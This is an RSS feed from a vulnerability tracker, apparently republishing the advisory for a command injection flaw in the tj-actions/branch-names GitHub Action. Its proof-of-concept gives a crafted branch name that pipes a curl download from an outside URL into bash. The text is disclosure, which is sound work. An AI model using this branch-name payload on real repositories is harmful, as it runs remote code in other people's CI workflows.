<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 09 Oct 2026 20:32:19 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-248625</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-248625</link>
      <description>EUVD-2026-248625</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-248625</guid>
    </item>
    <item>
      <title>fkie_cve-2025-54416</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-54416</link>
      <description>&lt;p&gt;tj-actions/branch-names is a Github actions repository that contains workflows to retrieve branch or tag names with support for all events. In versions 8.2.1 and below, a critical vulnerability has been identified in the tj-actions/branch-names&amp;#39; GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks. This is fixed in version 9.0.0&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;tj-actions/branch-names is a Github actions repository that contains workflows to retrieve branch or tag names with support for all events. In versions 8.2.1 and below, a critical vulnerability has been identified in the tj-actions/branch-names&amp;#39; GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks. This is fixed in version 9.0.0&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-54416</guid>
    </item>
    <item>
      <title>GHSA-gq52-6phf-x2r6 — tj-actions/branch-names has a Command Injection Vulnerability</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-gq52-6phf-x2r6</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; GitHub Actions: tj-actions/branch-names&lt;/p&gt;
&lt;p&gt;#### **Overview**&lt;/p&gt;
&lt;p&gt;A critical vulnerability has been identified in the `tj-actions/branch-names` GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.&lt;/p&gt;
&lt;p&gt;#### **Technical Details**&lt;/p&gt;
&lt;p&gt;The vulnerability stems from the unsafe use of the `eval printf &amp;#34;%s&amp;#34;` pattern within the action&amp;#39;s codebase. Although initial sanitization using `printf &amp;#34;%q&amp;#34;` properly escapes untrusted input, subsequent unescaping via `eval printf &amp;#34;%s&amp;#34;` reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:&lt;/p&gt;
&lt;p&gt;```bash
echo &amp;#34;base_ref_branch=$(eval printf &amp;#34;%s&amp;#34; &amp;#34;$BASE_REF&amp;#34;)&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_OUTPUT&amp;#34;
echo &amp;#34;head_ref_branch=$(eval printf &amp;#34;%s&amp;#34; &amp;#34;$HEAD_REF&amp;#34;)&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_OUTPUT&amp;#34;
echo &amp;#34;ref_branch=$(eval printf &amp;#34;%s&amp;#34; &amp;#34;$REF_BRANCH&amp;#34;)&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_OUTPUT&amp;#34;
```&lt;/p&gt;
&lt;p&gt;This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.&lt;/p&gt;
&lt;p&gt;#### **Proof-of-Concept (PoC)**&lt;/p&gt;
&lt;p&gt;1. Create a branch with the name `$(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)`.
2. Trigger the vulnerable workflow by opening a pull request into the target repository.
3. Observe arbitrary code exec…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; GitHub Actions: tj-actions/branch-names&lt;/p&gt;
&lt;p&gt;#### **Overview**&lt;/p&gt;
&lt;p&gt;A critical vulnerability has been identified in the `tj-actions/branch-names` GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.&lt;/p&gt;
&lt;p&gt;#### **Technical Details**&lt;/p&gt;
&lt;p&gt;The vulnerability stems from the unsafe use of the `eval printf &amp;#34;%s&amp;#34;` pattern within the action&amp;#39;s codebase. Although initial sanitization using `printf &amp;#34;%q&amp;#34;` properly escapes untrusted input, subsequent unescaping via `eval printf &amp;#34;%s&amp;#34;` reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:&lt;/p&gt;
&lt;p&gt;```bash
echo &amp;#34;base_ref_branch=$(eval printf &amp;#34;%s&amp;#34; &amp;#34;$BASE_REF&amp;#34;)&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_OUTPUT&amp;#34;
echo &amp;#34;head_ref_branch=$(eval printf &amp;#34;%s&amp;#34; &amp;#34;$HEAD_REF&amp;#34;)&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_OUTPUT&amp;#34;
echo &amp;#34;ref_branch=$(eval printf &amp;#34;%s&amp;#34; &amp;#34;$REF_BRANCH&amp;#34;)&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_OUTPUT&amp;#34;
```&lt;/p&gt;
&lt;p&gt;This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.&lt;/p&gt;
&lt;p&gt;#### **Proof-of-Concept (PoC)**&lt;/p&gt;
&lt;p&gt;1. Create a branch with the name `$(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)`.
2. Trigger the vulnerable workflow by opening a pull request into the target repository.
3. Observe arbitrary code exec…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-gq52-6phf-x2r6</guid>
    </item>
  </channel>
</rss>
